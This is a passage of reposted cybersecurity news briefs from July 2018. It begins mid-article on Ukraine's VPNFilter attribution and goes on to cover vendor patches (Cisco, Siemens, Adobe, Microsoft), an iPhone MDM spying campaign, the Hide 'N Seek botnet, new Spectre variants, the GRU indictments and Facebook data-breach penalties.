While the SBU’s statement suggests that this attack was specifically aimed at the chlorine station, it’s also possible that the organization was an opportunistic target. VPNFilter at one point had ensnared at least 500,000 routers and network-attached storage (NAS) devices and Ukraine appears to be its main target.
Even after U.S. authorities disrupted VPNFilter by seizing one of its command and control (C&C) domains, researchers reported that the threat had continued to target devices in Ukraine.
The fact that Ukraine has attributed the VPNFilter attack to Russia is not surprising. Even the United States government has linked the operation to some cyber-espionage groups believed to be sponsored by the Kremlin.
The VPNFilter botnet, whose existence was brought to light in May, targets more than 50 types of routers and NAS devices from Linksys, MikroTik, Netgear, TP-Link, QNAP, ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.
The malware can intercept data passing through the compromised device, it can monitor the network for communications over the Modbus SCADA protocol, and also has destructive capabilities that can be leveraged to make an infected device unusable.
This is not the first time an attack that targets Ukraine has been blamed on Russia. Moscow has also been accused of launching the NotPetya attack and campaigns aimed at Ukraine’s power grid.
Support for Python Packages Added to GitHub Security Alerts
18.7.2018 securityweek Security
GitHub announced on Thursday that developers will be warned if the Python packages used by their applications are affected by known vulnerabilities.
The code hosting service last year introduced a new feature, the Dependency Graph, that lists the libraries used by a project. It later extended it with a capability designed to alert developers when one of the software libraries used by their project has a known security hole.
“We’ve chosen to launch the new platform offering with a few recent vulnerabilities,” GitHub said in a blog post. “Over the coming weeks, we will be adding more historical Python vulnerabilities to our database.”
The security alerts feature is powered by information collected from the National Vulnerability Database (NVD) and other sources. When a new flaw is disclosed, GitHub identifies all repositories that use the affected version and informs their owners.
The security alerts are enabled by default for public repositories, but the owners of private repositories will have to manually enable the feature.
When a vulnerable library is detected, a “Known security vulnerability” alert will be displayed next to it in the Dependency Graph. Administrators can also configure email alerts, web notifications, and warnings via the user interface, and they can configure who should see the alerts.
GitHub reported in March that the introduction of the security alerts led to a significant decrease in the number of vulnerable libraries on the platform.
When the feature was launched, GitHub’s initial scan revealed over 4 million vulnerabilities across more than 500,000 repositories. Roughly two weeks after the first notifications were sent out, over 450,000 of the flaws were addressed by updating the impacted library or removing it altogether.
Cisco Patches High Risk Flaws in StarOS, IP Phone
18.7.2018 securityweek Vulnerebility
Cisco this week released a set of security patches to address several vulnerabilities in its products, including High risk issues impacting StarOS and 6800, 7800, and 8800 Series IP Phones.
The first High severity bug (CVE-2018-0369) impacts the reassembly logic for fragmented IPv4 packets of Cisco StarOS running on virtual platforms. By abusing this security flaw, an unauthenticated remote attacker could trigger a reload of the npusim process, thus causing denial of service (DoS).
An attacker could trigger the simultaneous reload of all four instances of the npusim process that are running per Service Function (SF) instance.
According to Cisco, the vulnerability resides in the improper handling of fragmented IPv4 packets containing options. Thus, an attacker could exploit the issue by sending a malicious IPv4 packet across an affected device.
“An exploit could allow the attacker to trigger a restart of the npusim process, which will result in all traffic queued toward this instance of the npusim process to be dropped while the process is restarting. The npusim process typically restarts within less than a second,” Cisco explains in an advisory.
Impacted products include Cisco Virtualized Packet Core-Single Instance (VPC-SI), Cisco Virtualized Packet Core-Distributed Instance (VPC-DI), and Cisco Ultra Packet Core (UPC) running StarOS operating system releases prior to the fixed version.
The second High risk flaw (CVE-2018-0341) addressed this week impacts the web-based UI of Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware and could be exploited by an authenticated, remote attacker for command injection.
“The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by including arbitrary shell commands in a specific user input field,” Cisco says.
In addition to these two bugs, Cisco addressed six Medium severity issues in Web Security Appliance (WSA), FireSIGHT System Software, Firepower System Software, and Digital Network Architecture (DNA).
Exploitation of these vulnerabilities could result in denial of service, bypass of file policy, bypass of URL-based access control policy, and cross-site scripting (XSS) attacks, Cisco’s advisories reveal.
Flaws Expose Siemens Protection Relays to DoS Attacks
18.7.2018 securityweek ICS
Siemens has informed customers that some of the company’s SIPROTEC protection relays are exposed to denial-of-service (DoS) attacks due to a couple of vulnerabilities present in the EN100 communication module.
SIPROTEC devices provide control, protection, measurement and automation functions for electrical substations. These products use the EN100 ethernet module for IEC 61850, PROFINET IO, Modbus, DNP3 and IEC 104 communications.
Researchers at ScadaX, an independent group of experts focusing on ICS and IoT security, discovered that the EN100 module and SIPROTEC 5 relays are impacted by two DoS vulnerabilities that can be exploited by sending specially crafted packets to the targeted device’s TCP port 102.Siemens SIPROTEC relays affected by DoS vulnerabilities
Exploitation of the flaws causes the device’s network functionality to enter a DoS condition, which Siemens says compromises the system’s availability. Manual intervention is required to restore the impacted service.
An attacker needs access to the targeted organization’s network and IEC 61850-MMS communication needs to be enabled in order to exploit the flaws, but no user interaction is required.
The vulnerabilities are similar, but one of them, tracked as CVE-2018-11451, has been classified as “high severity,” while the other, CVE-2018-11452, which impacts the EN100 module if oscilographs are running, has been rated “medium severity.” Siemens noted that SIPROTEC 5 relays are only affected by the more serious flaw.
Siemens has released firmware updates for some of the impacted devices to address the flaws, and advised users to block access to port 102 with an external firewall to prevent attacks on systems for which patches have yet to be made available.
Industry professionals have often warned that DoS vulnerabilities are far more severe in the case of industrial control systems compared to regular IT systems due to the fact that they impact availability, which is a top priority in industrial environments.
In the case of Siemens’ SIPROTEC relays, the threat is not just theoretical. Researchers reported last year that the attackers behind the Industroyer/Crashoverride malware, which was linked to the December 2016 attack on an electrical substation in Ukraine, had also developed a DoS tool that exploited CVE-2015-5374 to cause SIPROTEC relays to become unresponsive.
Attackers Target iPhones Using Open Source MDM Solution
18.7.2018 securityweek Apple
Recently discovered cyber attacks targeting iPhone users have been using an open source mobile device management (MDM) system to control enrolled devices, Talos reports.
Enrollment of targeted devices could be performed via physical access or social engineering, but Talos could not determine which method the attackers used. As part of a highly targeted campaign, the attackers went to great lengths in their attempt to replace specific apps and intercept user data.
With the use of the MDM solution, the actor deployed five applications to the 13 targeted devices in India. As a result, they were able to steal SMS messages, view the device location, and exfiltrate data. Apple has been informed on the attack and has already acted against the certificates the attackers used.
Talos security researchers discovered that the attackers added features to legitimate apps (including WhatsApp and Telegram) using the BOptions sideloading technique. Then, the MDM was used to deploy the apps onto targeted devices.
The injected malicious code could gather and steal information such as phone number, serial number, location, contacts, user's photos, SMS and Telegram and WhatsApp chat messages.
The malware appears to have been in use since August 2015, logs on the MDM server and the command and control (C&C) server reveal. Based on other information found on these servers, Talos believes that the malware author works out of India.
The two MDM servers used by the attackers are based on the small, open-source project mdm-server. Through MDM, admins can control multiple devices from a single location, can install and remove apps and certificates, lock the device, change password requirements, and more.
The enrollment process, however, requires user interaction at each step, which suggests that social engineering was used as part of the attack. Most likely, users were advised to install the attacker’s certificate to allow enrollment, and the use of a domain such as "ios-certificate-update[.]com" helped them trick users.
The attacker used a certificate issued in September 2017 for an email address located in Russia, which is believed to be a false flag, as the attacker isn’t located in Russia. The certificates are either self-signed or signed by the Comodo certificate authority.
According to Talos, the affected devices, all located in India, include the following models: iPhone 5.4, iPhone 7.2, iPhone 8.1, iPhone 8.2, iPhone 9.3, and iPhone 9.4. The operating system versions include 10.2.1, 10.3.1, 10.3.2, 10.3.3, 11.0, 11.0.3, 11.2.1, 11.2.5, and 11.2.6.
While there’s no information available on how the 13 devices were enrolled in the MDM, the attacker likely tested the solution on their own iPhone, the researchers say.
The attack, however, appears focused on deploying malicious apps onto the compromised devices to steal information. The attacker injected code into applications such as AppsSLoader, Telegram, WhatsApp, PrayTime, and MyApp and then loaded them onto the targeted iPhones.
The malicious Telegram and WhatsApp versions were observed sending the collected information to a server that has been active since August 2015.
“At the time, it is unclear who the targets of the campaign were, who was the perpetrator, or what the exact purpose was. It's very likely the vector for this campaign was simply social engineering - in other words asking the user to click "ok". This type of vector is very difficult to defend against since users can often be tricked into acting against their best interests,” Talos concludes.
12 Russian Intelligence Officers Indicted for Hacking U.S. Democrats
18.7.2018 securityweek BigBrothers
Twelve Russian intelligence officers were indicted by a US grand jury on Friday -- just three days before President Donald Trump is scheduled to meet with Russia's Vladimir Putin -- for interfering in the November 2016 presidential election.
The charges were drawn up by Special Counsel Robert Mueller, the former FBI director who is looking into Russian interference in the 2016 vote and whether any members of Trump's campaign colluded with Moscow.
The indictment accuses members of Russia's military intelligence agency known as the GRU of carrying out "large-scale cyber operations" to steal Democratic Party documents and emails.
Deputy Attorney General Rod Rosenstein, who announced the indictment at a press conference in Washington, said "there's no allegation in this indictment that any American citizen committed a crime."
Rosenstein said "the conspirators corresponded with several Americans during the course of the conspiracy through the internet."
However, "there's no allegation in this indictment that the Americans knew they were corresponding with Russian intelligence officers," he said.
Rosenstein also stressed that "there's no allegation that the conspiracy changed the vote count or affected any election result."
Rosenstein said he briefed Trump about the indictment before Friday's announcement and that the timing was determined by "the facts, the evidence, and the law."
The deputy attorney general's press conference came as Trump was meeting Queen Elizabeth II and just three days before his meeting with Putin in Helsinki.
- Calls to cancel Putin meeting -
Senator Chuck Schumer, the Democratic Senate minority leader, immediately called on Trump to cancel the Putin talks.
"These indictments are further proof of what everyone but the president seems to understand: President Putin is an adversary who interfered in our elections to help President Trump win," Schumer said in a statement.
"President Trump should cancel his meeting with Vladimir Putin until Russia takes demonstrable and transparent steps to prove that they won't interfere in future elections," he said.
Speaking earlier Friday, before the indictments were announced, Trump said he would ask Putin about the allegations of Russian election meddling.
"I will absolutely, firmly ask the question, and hopefully we'll have a good relationship with Russia," he told a joint press conference with British Prime Minister Theresa May.
But he simultaneously denounced the Mueller investigation as a "rigged witch hunt," and said he has been "tougher on Russia than anybody."
"We have been extremely tough on Russia," Trump said.
The US president recalled that 60 intelligence officers were expelled from the Russian embassy in Washington in response to a nerve agent attack on a former Russian spy in Britain.
Russia has denied any involvement in the attack and rejected accusations that it interfered in the US presidential election in a bid to bring about the defeat of Democrat Hillary Clinton.
Rosenstein said 11 of the Russians indicted Friday were charged with "conspiring to hack into computers, steal documents, and release those documents with the intent to interfere in the election.
"One of those defendants and a 12th Russian are charged with conspiring to infiltrate computers of organizations involved in administering elections," he added.
"The defendants accessed email accounts of volunteers and employees of a US presidential campaign, including the campaign chairman starting in March of 2016," the deputy attorney general said.
"They also hacked into the computer networks of a congressional campaign committee and a national political committee."
Trump Says 'Might' Ask Putin to Extradite Accused Russian Hackers
18.7.2018 securityweek Hacking
Donald Trump has said he may ask Vladimir Putin during their upcoming summit meeting to extradite to the US 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.
Speaking in an interview with CBS Evening News conducted on Saturday ahead of his meeting with the Russian leader in Helsinki on Monday, the US president also sought to temper expectations about how much could be achieved.
Asked whether he would press his Russian counterpart to send to the US members of the Russian military intelligence agency accused of hacking Hillary Clinton's failed presidential campaign, he said: "Well, I might.
"I hadn't thought of that. But I certainly, I'll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration," he told CBS's Jeff Glor on "Face the Nation."
Speaking before the summit in Helsinki, Trump added that his Republican Party had also been the target of Russian hacking efforts but had superior cyber security measures in place.
"I think the DNC (Democratic National Committee) should be ashamed of themselves for allowing themselves to be hacked," he said. "They had bad defenses and they were able to be hacked. But I heard they were trying to hack the Republicans too. But -- and this may be wrong -- but they had much stronger defenses."
CNN reported in January last year that then-FBI Director James Comey told a Senate panel that "old emails" of the Republican National Committee had been the target of hacking -- but the material was not publicly released -- and there was no sign the current RNC or the Trump campaign had been successfully hacked.
The indictments issued Friday by special counsel Robert Mueller allege that the Russian hackers publicly released tens of thousands of stolen Democratic emails and documents using "fictitious online personas."
Mueller is investigating possible collusion between Trump's campaign and Russia.
"If the Russians wanted to exfiltrate data from the RNC and use it against Donald Trump, they would have done so," Democratic Congressman Adam Schiff said on CNN's "State of the Union" Sunday.
While Trump blamed the administration of former president Barack Obama, not Russia, after the indictments, US ambassador to Moscow Jon Huntsman said Sunday that "Russia is guilty of involvement and mischief in our election this last go-around."
He said the summit is important as the start of a dialogue, not only about election meddling but a range of issues.
- At boiling point -
Huntsman said on "Fox News Sunday" that Trump "is genuinely looking forward to sitting across the table and trying to reduce the tension in a relationship where our collective blood pressure is off-the-charts high."
The two presidents have shared personal bonhomie in the past, but beyond the alleged hacking of the US election, their countries are deeply divided on a host of other issues including Syria and Ukraine.
Before coming to Europe, Trump predicted his meeting with Putin could be the "easiest" stage of a tour that included stops in Brussels and Britain.
But he told CBS that he was going into it with "low expectations."
Trump also defended his decision to hold the meeting after opposition Democrats, and Republican Senator John McCain, said the summit should be canceled in the wake of the indictments.
"I believe it's really good. So having meetings with Russia, China, North Korea, I believe in it. Nothing bad is going to come out of it, and maybe some good will come out," the president said in broadcast excerpts. The rest of the interview will air on Monday.
Trump told CBS that "Russia is a foe in certain respects," and also named the European Union and China as "foes" economically, over trade practices for which Washington has imposed sanctions, sparking a trade war.
US National Security Adviser John Bolton said that, after the indictments, Trump "can put this on the table and say, this is a serious matter that we need to talk about."
He told ABC's "This Week" that "it's very important that the president has a direct one-on-one conversation" with Putin, and European leaders have expressed support for it.
Over 100 Vulnerabilities Patched in Adobe Acrobat, Reader
18.7.2018 securityweek Vulnerebility
Adobe on Tuesday released security updates that patch 105 vulnerabilities in Acrobat and Reader, two in Flash Player, three in Experience Manager, and three in Connect.
The latest versions of Acrobat and Reader for Windows and macOS address tens of critical memory corruption bugs that can allow remote code execution, including double-free, heap overflow, use-after-free, out-of-bounds write, type confusion, untrusted pointer dereference, and buffer error issues.
The list of weaknesses fixed with this month’s Patch Tuesday updates also includes a critical privilege escalation and tens of important out-of-bounds read issues that lead to information disclosure.
Over two dozen researchers have been credited for responsibly disclosing these flaws to Adobe. Many of the security holes were reported to the vendor through Trend Micro’s Zero-Day Initiative (ZDI).
In the case of Flash Player, version 220.127.116.11 resolves a critical type confusion issue that can lead to code execution and a flaw rated important that can result in information disclosure.
Hotfixes released by Adobe for Experience Manager patch three server-side request forgery (SSRF) vulnerabilities that can lead to the exposure of sensitive information, but none of the flaws are considered critical.
Finally, updates released for Adobe Connect fix authentication bypass and insecure library loading flaws that have been assigned medium and important severity ratings.
Adobe says it’s not aware of any malicious exploitation attempts for the vulnerabilities patched with this round of updates and the company does not expect to see attacks leveraging these flaws any time soon.
PE Firm Thoma Bravo Buys Majority Stake in Centrify
18.7.2018 securityweek IT
Private equity investment firm Thoma Bravo said it will acquire a majority interest in identity and access management (IAM) solutions firm Centrify.
Financial details of the transaction were not disclosed, and the transaction is expected to close in the third quarter of this year.
Founded in 2004, Centrify has raised a total of $94 million in funding to date, and offers a unified platform that provides Privileged Identity Management (PIM) and Identity-As-A-Service (IDaaS).
The Santa Clara, California-based company serves over five thousand customers around the world in industries including defense, banking, energy, retail, manufacturing and health care.
Thoma Bravo has made several large investments in the cybersecurity space over the years. In May 2018, it announced that it would acquire a majority interest in Security Information and Event Management (SIEM) solutions vendor LogRhythm. Other cybersecurity investments include SonicWall, SailPoint, Hyland Software, Deltek, Blue Coat Systems, Imprivata, Bomgar, Barracuda Networks, Compuware and SolarWinds.
“With Thoma Bravo’s extensive sector experience and insight in the enterprise security software space, Centrify is in a strong position to provide our products, services and unique expertise to meet the rising need for identity-based cybersecurity technology in today’s global environment,” Tom Kemp, co-founder and CEO of Centrify, said in a statement.
Hide 'N Seek IoT Botnet Can Infect Database Servers
18.7.2018 securityweek BotNet
The Hide 'N Seek Internet of Things (IoT) botnet has recently added support for more devices and can also infect OrientDB and CouchDB database servers, Qihoo 360's NetLab researchers say.
When first detailed in January this year, the botnet was evolving and spreading rapidly, ensnaring tens of thousands of devices within days. Targeting numerous vulnerabilities, the malware was capable of data exfiltration, code execution, and interference with the device operation.
By early May, the malware had infected over 90,000 devices, added code to target more vulnerabilities, and also adopted persistence, being able to survive reboots. The persistence module, however, would only kick in if the infection was performed over the Telnet service.
A peer-to-peer (P2P) botnet, Hide 'N Seek has continued to evolve, and is currently targeting even more vulnerabilities than before. The botnet now also includes exploits for AVTECH devices (webcam) and Cisco Linksys routers, Qihoo 360's NetLab reveals.
Furthermore, the malware now includes 171 hardcoded P2P node addresses, has added a crypto-currency mining program to its code, and has also evolved into a cross-platform threat, with the addition of support for OrientDB and CouchDB database servers.
The botnet’s spreading mechanism includes a scanner borrowed from Mirai, targeting fixed TCP port 80/8080/2480/5984/23 and other random ports.
For infection, the malware attempts remote code execution using exploits targeting TPLink Routers, Netgear routers (also targeted by Reaper botnet and Mirai variant Wicked), AVTECH cameras, Cisco Linksys Routers, JAW/1.0, OrientDB, and Apache CouchDB.
The Hide 'N Seek bots attempt to contact other P2P peers using one of three methods: a hard-coded built-in list of 171 peer addresses, command-line arguments, and via other P2P peers. The node would also interact with the 171 peers for check-in purposes and during the follow-up interaction process.
“When started with no command-line args, HNS node will send lots of UPD check-in packets. IP addresses of these packets are randomized, while some others are set based on the build-in list,” the NetLab researchers explain.
Due to its peer-to-peer architecture, the botnet is rather difficult to shut down. Furthermore, the constant stream of updates received over the past half a year suggests that Hide 'N Seek will continue to evolve, likely broadening its capabilities and target list.
Microsoft Patch Tuesday Updates Fix Over 50 Vulnerabilities
18.7.2018 securityweek Vulnerebility
Microsoft’s Patch Tuesday updates for July 2018 address more than 50 vulnerabilities, but none of them appear to have been exploited for malicious purposes before the fixes were released.
The company has classified 18 of the flaws as critical and, similar to previous months, they mostly affect the Edge and Internet Explorer web browsers. Many of these security holes have been described as memory corruption bugs that allow remote code execution.
Three of the flaws patched this month were publicly disclosed before Microsoft released patches. The list includes CVE-2018-8278, a spoofing vulnerability affecting Edge; and CVE-2018-8314 and CVE-2018-8313, both of which are Windows privilege escalation vulnerabilities.
Trend Micro’s Zero Day Initiative (ZDI) has highlighted some of the more interesting flaws patched this month. One of them is a low severity Office tampering issue that can be exploited by getting the targeted user to open a specially crafted file.
“An attacker exploiting this vulnerability could embed untrusted TrueType fonts into an email. Bugs in fonts have been popular since 2013 and have been used in malware attacks in the past. This bug could allow them to spread and possibly even bypass traditional filters. That’s likely the reason Microsoft chose to go ahead and release a patch for this Low-rated vulnerability,” ZDI explained in a blog post.
Another interesting vulnerability that is not very serious affects the Microsoft Wireless Display Adapter (MWDA). The flaw allows an authenticated attacker to execute arbitrary commands, but what makes the issue interesting is the fact that a firmware update is required to address it.
“To get the new firmware, it has to be downloaded from the Wireless Display Adapter App available in the Microsoft App Store. That doesn’t sound like something easily automated. From a sysadmin’s perspective, this patch will be very labor intensive to roll out,” ZDI said.
Microsoft also made some updates to advisories describing the Spectre and Meltdown vulnerabilities, including to inform users of a new Spectre variant.
Adobe’s Patch Tuesday updates resolve more than 100 vulnerabilities in Acrobat and Reader, including tens of critical memory corruption bugs that can allow remote code execution. The company has also released security updates for Flash Player, Experience Manager, and Connect.
Departing Apple Engineer Stole Autonomous Car Tech: FBI
18.7.2018 securityweek BigBrothers
An ex-Apple engineer on Monday was charged with stealing secrets from a hush-hush self-driving car technology project days before he quit to go to a Chinese startup.
Xiaolang Zhang was in custody for stealing trade secrets from the Apple project, according to a copy of the criminal complaint posted online.
The charge is punishable by 10 years in prison and a $250,000 fine.
"Apple takes confidentiality and the protection of our intellectual property very seriously," the California-based internet titan said in response to an AFP query.
"We're working with authorities on this matter and will do everything possible to make sure this individual and any other individuals involved are held accountable for their actions."
Zhang was hired by Apple in December of 2015 to be part of a team developing hardware and software for self-driving vehicles, a project that was a "closely-guarded secret," according to the complaint filed by the FBI.
Zhang took paternity leave in the month of April, going with his family to China.
Upon his return to Apple at the end of April, he told a supervisor he was quitting to return to China to be near his ailing mother.
Zhang mentioned he planned to go work for a Chinese self-driving vehicle startup called Xiaopeng Motors, or XMotors, in Guangzhou, according to the complaint.
The supervisor thought Zhang "evasive" and brought in an Apple product security team, which had Zhang turn in all company devices and walked him off campus, according to the filing.
Apple security found that Zhang's activity on the company network surged "exponentially" in the days before he returned from paternity leave.
Zhang did searches of confidential databases, and downloaded technical files, the criminal complaint said.
Documents downloaded by Zhang included some on topics such as "prototypes," according to the case against him.
Apple also had closed-circuit camera recording of Zhang going into autonomous driving tech team labs late on a Saturday night while he was on paternity leave, according to the filing.
Zhang later admitted to taking circuit boards and a Linux server from the hardware lab, and to transferring some Apple files to his wife's computer, the FBI said in the complaint.
Zhang was "voluntarily terminated" from Apple in early March, and FBI agents searched his home in June as part of their investigation.
Zhang told the FBI at that time he was working at XMotors offices in Silicon Valley, according to the complaint.
Zhang was heading to China with a "last-minute round-trip ticket" when FBI agents arrested him at an airport in the Silicon Valley city of San Jose, the filing said.
Intel Pays $100,000 Bounty for New Spectre Variants
18.7.2018 securityweek Security
Researchers have discovered new variations of the Spectre attack and they received $100,000 from Intel through the company’s bug bounty program.
The new flaws are variations of Spectre Variant 1 (CVE-2017-5753) and they are tracked as Spectre 1.1 (CVE-2018-3693) and Spectre 1.2.
The more serious of these issues is Spectre 1.1, which has been described as a bounds check bypass store (BCBS) issue.
“[Spectre1.1 is] a new Spectre-v1 variant that leverages speculative stores to create speculative buffer overflows,” researchers Vladimir Kiriansky of MIT and Carl Waldspurger of Carl Waldspurger Consulting explained in a paper.
New Spectre vulnerabilities discovered
“Much like classic buffer overflows, speculative out-of-bounds stores can modify data and code pointers. Data-value attacks can bypass some Spectre-v1 mitigations, either directly or by redirecting control flow. Control-flow attacks enable arbitrary speculative code execution, which can bypass fence instructions and all other software mitigations for previous speculative-execution attacks. It is easy to construct return-oriented-programming (ROP) gadgets that can be used to build alternative attack payloads,” they added.
Spectre 1.2 impacts CPUs that fail to enforce read/write protections, allowing an attacker to overwrite read-only data and code pointers in an effort to breach sandboxes, the experts said.
Both Intel and ARM have published whitepapers describing the new vulnerabilities. AMD has yet to make any comments regarding Spectre 1.1 and Spectre 1.2.
Microsoft also updated its Spectre/Meltdown advisories on Tuesday to include information on CVE-2018-3693.
“We are not currently aware of any instances of BCBS in our software, but we are continuing to research this vulnerability class and will work with industry partners to release mitigations as required,” the company said.
Oracle is also assessing the impact of these vulnerabilities on its products and has promised to provide technical mitigations.
“Note that many industry experts anticipate that a number of new variants of exploits leveraging these known flaws in modern processor designs will continue to be disclosed for the foreseeable future,” noted Eric Maurice, Director of Security Assurance at Oracle. “These issues are likely to primarily impact operating systems and virtualization platforms, and may require software update, microcode update, or both. Fortunately, the conditions of exploitation for these issues remain similar: malicious exploitation requires the attackers to first obtain the privileges required to install and execute malicious code against the targeted systems.”
Just as the researchers published their paper, Intel made a $100,000 payment to Kiriansky via the company’s HackerOne bug bounty program. The experts did reveal in their paper that the research was partially sponsored by Intel.
Following the disclosure of the Spectre and Meltdown vulnerabilities in January, Intel announced a bug bounty program for side-channel exploits with rewards of up to $250,000 for issues similar to Meltdown and Spectre. The reward for flaws classified “high severity” can be as high as $100,000.
Facebook Faces Australia Data Breach Compensation Claim
18.7.2018 securityweek Social
Facebook could face a hefty compensation bill in Australia after a leading litigation funder lodged a complaint with the country's privacy regulator over users' personal data shared with a British political consultancy.
The social networking giant admitted in April the data of up to 87 million people worldwide -- including more than 300,000 in Australia -- was harvested by Cambridge Analytica.
Under Australian law, all organisations must take "reasonable steps" to ensure personal information is held securely and IMF Bentham has teamed up with a major law firm to lodge a complaint with the Office of the Australian Information Commissioner (OAIO).
The OAIO launched an investigation into the alleged breaches in April and depending on its outcome, a class action could follow.
IMF said in a statement late Tuesday it was seeking "compensation for Facebook users arising from Facebook's alleged breaches of the Australian Privacy Principles contained in the Privacy Act 1988".
"The alleged breaches surround the circumstances in which a third party, Cambridge Analytica, gained unauthorised access to users' profiles and information.
"The complaint seeks financial recompense for the unauthorised access to, and use of, their personal data."
In its statement, IMF Bentham said it appeared Facebook learned of the breach in late 2015, but failed to tell users about it until this year.
IMF investment manager Nathan Landis told The Australian newspaper most awards for privacy breaches ranged between Aus$1,000 and Aus$10,000 (US$750-US$7,500).
This implies a potential compensation bill of between Aus$300 million and Aus$3 billion.
Facebook did not directly comment on the IMF Bentham action but a spokesperson told AFP Wednesday: "We are fully cooperating with the investigation currently underway by the Australian Privacy Commissioner.
"We will review any additional evidence that is made available when the UK Office of the Information Commissioner releases their report."
CredSSP Flaw Exposes Pepperl+Fuchs HMI Devices to Attacks
18.7.2018 securityweek Attack Vulnerebility
A vulnerability in the Credential Security Support Provider (CredSSP) authentication protocol has been found to impact several human-machine interface (HMI) products from Germany-based industrial automation firm Pepperl+Fuchs.
The flaw, tracked as CVE-2018-0886, affects all supported versions of Windows and it was fixed by Microsoft with its March 2018 Patch Tuesday updates.
The vulnerability was discovered by security firm Preempt, which has classified it as critical, but Microsoft, which believes exploitation is “less likely,” has assigned it only an “important” severity rating.
CredSSP processes authentication requests for applications such as the Remote Desktop Protocol (RDP) and Windows Remote Management (WinRM). A man-in-the-middle (MitM) attacker can exploit this vulnerability to remotely execute arbitrary code and move laterally within the targeted organization’s network.
Microsoft says any application using CredSSP for authentication could be vulnerable to this type of attack.
According to an advisory published by Germany’s CERT@VDE, an organization that focuses on industrial cybersecurity, CVE-2018-0886 affects Pepperl+Fuchs’ VisuNet RM, VisuNet PC, and Box Thin Client BTC human-machine interface products.
“A successful vulnerability exploitation enables an attacker to execute arbitrary code and get access to sensitive data, e.g. passwords of the compromised system. The vulnerability allows the attacker to intercept the initial RDP connection between a client and a remote-server. Then an attacker can relay user credentials to a target system and thus get complete Man in the Middle control over a session. A stolen session can be abused to run arbitrary code or commands on the target server on behalf of the user,” CERT@VDE said in its advisory.
Pepperl+Fuchs has advised owners of devices running RM Shell 4 and RM Shell 5 HMI software to install the security patches provided by the company. Users of devices running Windows 7 or Windows 10 can patch the vulnerability by updating Windows.
The advisory from CERT@VDE says Preempt reported the vulnerabilities to Pepperl+Fuchs, but the security firm told SecurityWeek that it did not explicitly reach out to any ICS vendor.
“CredSSP is a broadly used protocol and we worked with Microsoft, since it was in their software that we found these vulnerabilities,” said Ajit Sancheti, co-founder and CEO at Preempt. “It is quite likely that Pepperl+Fuchs uses the MSFT version and hence may have been informed by them.”
Products from other ICS vendors are likely also affected by the CredSSP vulnerability, but to date no other company has published security advisories.
Britain to Fine Facebook Over Data Breach
18.7.2018 securityweek Incindent Social
Britain's data regulator said Wednesday it will fine Facebook half a million pounds for failing to protect user data, as part of its investigation into whether personal information was misused ahead of the Brexit referendum.
The Information Commissioner's Office (ICO) began investigating the social media giant earlier this year, when evidence emerged that an app had been used to harvest the data of tens of millions of Facebook users worldwide.
In the worst ever public relations disaster for the social media giant, Facebook admitted that up to 87 million users may have had their data hijacked by British consultancy firm Cambridge Analytica, which was working for US President Donald Trump's 2016 campaign.
Cambridge Analytica, which also had meetings with the Leave.EU campaign ahead of Britain's EU referendum in 2016, denies the accusations and has filed for bankruptcy in the United States and Britain.
"In 2014 and 2015, the Facebook platform allowed an app... that ended up harvesting 87 million profiles of users around the world that was then used by Cambridge Analytica in the 2016 presidential campaign and in the referendum," Elizabeth Denham, the information commissioner, told BBC radio.
Wednesday's ICO report said: "The ICO's investigation concluded that Facebook contravened the law by failing to safeguard people's information."
Without detailing how the information may have been used, it said the company had "failed to be transparent about how people's data was harvested by others".
The ICO added that it plans to issue Facebook with the maximum available fine for breaches of the Data Protection Act -- an equivalent of $660,000 or 566,000 euros.
Because of the timing of the breaches, the ICO said it was unable to impose penalties that have since been introduced by the European General Data Protection, which would cap fines at 4.0 percent of Facebook's global turnover.
In Facebook's case this would amount to around $1.6 billion (1.4 billion euros).
"In the new regime, they would face a much higher fine," Denham said.
- 'Doing the right thing' -
"We are at a crossroads. Trust and confidence in the integrity of our democratic processes risk being disrupted because the average voter has little idea of what is going on behind the scenes," Denham said.
"New technologies that use data analytics to micro-target people give campaign groups the ability to connect with individual voters. But this cannot be at the expense of transparency, fairness and compliance with the law."
In May, Facebook chief Mark Zuckerberg apologised to the European Parliament for the "harm" caused.
EU Justice Commissioner Vera Jourova welcomed the ICO report.
"It shows the scale of the problem and that we are doing the right thing with our new data protection rules," she said.
"Everyone from social media firms, political parties and data brokers seem to be taking advantage of new technologies and micro-targeting techniques with very limited transparency and responsibility towards voters," she said.
"We must change this fast as no-one should win elections using illegally obtained data," she said, adding: "We will now assess what can we do at the EU level to make political advertising more transparent and our elections more secure."
- Hefty compensation bill -
The EU in May launched strict new data-protection laws allowing regulators to fine companies up to 20 million euros ($24 million) or four percent of annual global turnover.
But the ICO said because of the timing of the incidents involved in its inquiry, the penalties were limited to those available under previous legislation.
The next phase of the ICO's work is expected to be concluded by the end of October.
Erin Egan, chief privacy officer at Facebook, said: "We have been working closely with the ICO in their investigation of Cambridge Analytica, just as we have with authorities in the US and other countries. We're reviewing the report and will respond to the ICO soon."
The British fine comes as Facebook faces a potential hefty compensation bill in Australia, where litigation funder IMF Bentham said it had lodged a complaint with regulators over the Cambridge Analytica breech -- thought to affect some 300,000 users in Australia.
IMF investment manager Nathan Landis told The Australian newspaper most awards for privacy breaches ranged between Aus$1,000 and Aus$10,000 (US$750-$7,500).
This implies a potential compensation bill of between Aus$300 million and Aus$3 billion.
Israeli Firm Radiflow Raises $18 Million to Grow Industrial Cybersecurity Business
18.7.2018 securityweek IT ICS
Israeli cyber security firm Radiflow, which provides cybersecurity solutions for industrial control systems (ICS) and Supervisory control and data acquisition (SCADA) networks, announced on Wednesday that it has raised $18 million in venture funding through an investment round led by Singapore-based engineering company ST Engineering.
Radiflow’s product offerings include risk assessment, threat detection and secure remote access tools with industrial asset visibility and anomaly detection.
Under a strategic partnership, ST Engineering has integrated Radiflow’s detection and prevention tools with its SCADA system.
Radiflow logoMore specifically, Radiflow said that its tools would be integrated with ST Engineering’s Rail Command, Control and Communications (C3) Systems (SCADA) to offer an end-to-end cybersecurity solution for the rail transport industry.
Radiflow says the investment will be used to expand its sales team to support growing market demand, strengthen its brand globally and support product development.
Radiflow also recently announced partnerships with Palo Alto Networks and RSA, to make field deployments easier and help ensure compliance with new regulations, including NERC CIP and the EU NIS Directive.
Radiflow will demonstrate its technology at SecurityWeek’s 2018 ICS Cyber Security Conference, taking place October 22-25, 2018 in Atlanta.
